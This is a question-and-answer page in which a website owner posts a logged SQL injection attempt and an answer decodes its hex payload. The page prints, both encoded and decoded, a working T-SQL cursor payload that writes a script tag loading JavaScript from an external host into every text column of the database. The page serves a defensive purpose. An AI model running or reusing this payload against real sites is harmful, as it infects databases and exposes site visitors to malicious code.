Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 65169
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: May 10, 20262026-05-10T18:54:16+00:00 2026-05-10T18:54:16+00:00

I have a public facing website that has been receiving a number of SQL

  • 0

I have a public facing website that has been receiving a number of SQL injection attacks over the last few weeks. I exclusively use parameterised stored procedures so I believe that there has been no successful attacks, but a recent log showed an interesting technique:

Line breaks added for clarity

 http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%20@S%20CHAR(4000);SET  @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263  686172283430303029204445434C415245205461626C655F437572736F7220435552534F  5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F 626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69  6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72  20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970  653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420  46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528  404046455443485F5354415455533D302920424547494E20657865632827757064617465  205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C  736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373  7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077  6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73  6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372  73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854  2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043  4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43 7572736F72 AS CHAR(4000));EXEC(@S);&_X=' 

Can anyone shed light on what the ‘CAST and EXEC’ is attempting to do?

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. 2026-05-10T18:54:16+00:00Added an answer on May 10, 2026 at 6:54 pm

    Below is the decoded SQL that they were trying to push:

    DECLARE @T varchar(255),         @C varchar(4000)   DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b  WHERE a.id=b.id  AND a.xtype='u'  AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)   OPEN Table_Cursor FETCH NEXT  FROM Table_Cursor INTO @T,@C  WHILE(@@FETCH_STATUS=0)    BEGIN exec('update ['+@T+'] SET ['+@C+']='''></title><script src='http://www2.s800qn.cn/csrss/w.js'></script><!--''+['+@C+'] WHERE '+@C+' NOT like ''%'></title><script src='http://www2.s800qn.cn/csrss/w.js'></script><!--''')   FETCH NEXT FROM  Table_Cursor INTO @T,@C  END CLOSE Table_Cursor   DEALLOCATE Table_Cursor 
    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

ASP.NET - IIS 6 - we currently have a public-facing site that has a
I have a public-facing website that is used to manage business infrastructure equipment for
Imagine that I have a store. I have an admin side to the store
I have to enter some data to database, see my code. I am facing
I am facing a problem that I cannot see how it is solvable without
I'm working on a site that's grown both in terms of user-base and functionality
I'm using asp.net 3.5, my solution currently has 2 projects, an API class project
Let's say that I'm considering designing a WCF service whose primary purpose is to
I'm developing a Rails app that by default sets up user accounts to a
I have created a Silverlight enabled WCF Service which looks like : I am

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.